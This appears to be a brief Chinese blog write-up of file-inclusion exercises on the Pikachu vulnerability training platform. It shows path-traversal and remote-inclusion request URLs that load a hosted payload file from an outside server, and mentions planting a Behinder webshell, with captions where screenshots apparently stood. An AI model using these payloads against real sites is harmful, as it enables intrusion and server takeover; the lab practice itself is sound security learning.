pikachu 文件包含漏洞

2023-10-23 08:13:04

pikachu 文件包含漏洞

1 本地包含

http://192.168.52.143/pikachu/vul/fileinclude/fi_local.php?
filename=…/…/…/…/1.php&submit=提交查询
pikachu 文件包含漏洞

加载图片马
http://192.168.52.143/pikachu/vul/fileinclude/fi_local.php?filename=…/…/…/…/007.txt&submit=提交查询pikachu 文件包含漏洞

pikachu 文件包含漏洞
pikachu 文件包含漏洞

2 远程包含

放在服务器上
pikachu 文件包含漏洞
开启php.ini的allow_url_include

pikachu 文件包含漏洞
服务器起一个web服务

pikachu 文件包含漏洞
pikachu 文件包含漏洞
成功包含
http://192.168.8.105/pikachu/vul/fileinclude/fi_remote.php?filename=http://...:9999/123.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
pikachu 文件包含漏洞
上冰蝎
pikachu 文件包含漏洞
pikachu 文件包含漏洞

3 怎么挖这种漏洞

实际中没遇到过,得代码审计,include(),include_once()
require(),require_once()

上一篇:Pikachu漏洞练习平台 记录(xss)


下一篇:技术分享 | 专项测试技术初识Hook